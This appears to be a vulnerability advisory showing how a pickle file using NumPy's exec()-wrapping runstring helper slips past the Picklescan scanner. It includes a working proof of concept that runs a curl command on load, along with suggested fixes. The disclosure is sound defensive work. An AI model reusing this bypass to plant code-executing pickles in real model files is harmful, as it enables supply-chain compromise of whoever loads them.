Summary
An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools such as Picklescan and execute arbitrary code during deserialization. The attack imports a built-in helper function from the NumPy library that indirectly calls a dangerous function such as exec() on the Python code it receives as a parameter; within that code, the attacker can import a dangerous module such as os and execute arbitrary OS commands.
Details
Pickle’s deserialization process is known to allow execution of arbitrary callables via the __reduce__ method. While Picklescan is meant to detect such exploits, this attack evades detection by calling a function in the NumPy library that in turn calls the dangerous built-in exec(). Because the NumPy library is not on Picklescan's unsafe-globals blacklist, the payload raises no red flag in the security scan.
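To illustrate the underlying mechanism, here is a minimal, benign sketch: whatever callable __reduce__ returns is invoked with the supplied arguments at load time.

# Benign sketch of the __reduce__ mechanism: pickle stores the callable
# and its arguments, then invokes the callable during pickle.loads()
import pickle

class Demo:
    def __reduce__(self):
        return print, ("this runs during pickle.loads()",)

blob = pickle.dumps(Demo())
pickle.loads(blob)  # prints the message: the callable ran at load time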
The attack payload executes in the following steps:
- First, the attacker crafts the payload by importing the runstring function from numpy.testing._private.utils (a thin exec() wrapper; see the note after this list).
- Then, the payload's __reduce__ method returns runstring together with a code string that imports a dangerous module such as os and calls os.system() to run an OS command, for example curl. The attacker then sends this malicious pickle file to the victim.
- The victim checks whether the pickle file is safe using the Picklescan library; since the scanner detects no dangerous functions, the victim decides to pickle.load() the malicious file, leading to remote code execution.
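For reference, the gadget works because runstring is essentially a thin wrapper around exec(). Its body is roughly equivalent to the following paraphrase (the exact source may differ between NumPy versions):

# Rough paraphrase of numpy.testing._private.utils.runstring
def runstring(astr, dict):
    exec(astr, dict)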
PoC
import pickle

from picklescan.scanner import scan_file_path


class Payload:
    def __reduce__(self):
        # runstring exec()s the string it receives, with the given globals dict
        from numpy.testing._private.utils import runstring
        return runstring, ("import os; os.system('curl https://example.com')", {})


def create_payload():
    with open('payload.pickle', 'wb') as f:
        pickle.dump(Payload(), f)


def load_payload():
    # Scan the file first, as a cautious consumer would
    result = scan_file_path('payload.pickle')
    if result.infected_files != 0 or result.scan_err:
        print('File is infected')
    else:
        print('File is clean')
        # The scan reports the file as clean, so the victim loads it,
        # triggering the embedded os.system() call
        with open('payload.pickle', 'rb') as f:
            pickle.load(f)


create_payload()
load_payload()
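To see why the scan misses the payload, the standard-library pickletools module can show which globals the pickle actually references (exact opcode output varies by pickle protocol):

import pickletools

# Disassemble the payload: the only imported global is
# numpy.testing._private.utils runstring, which the blacklist does not cover
with open('payload.pickle', 'rb') as f:
    pickletools.dis(f)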
Impact
Severity: High
Who is impacted? Any organization or individual relying on Picklescan to detect malicious pickle files inside PyTorch models, for example the Invoke-AI repository (https://github.com/invoke-ai/InvokeAI).
What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scan but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Recommended Fixes:
I suggest adding the NumPy helpers that wrap exec(), such as numpy.testing._private.utils.runstring, to the unsafe-globals blacklist.
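Independent of any Picklescan fix, consumers can also refuse to resolve unexpected globals at load time. Below is a minimal sketch of the restricted-Unpickler pattern from the Python documentation; the allowlist contents here are an assumption and must be tailored to what your pickles legitimately contain:

import io
import pickle

# Hypothetical allowlist: only the globals your application actually expects
SAFE_GLOBALS = {('builtins', 'list'), ('builtins', 'dict')}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve a global only if it is explicitly allowlisted
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f'global {module}.{name} is forbidden')

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()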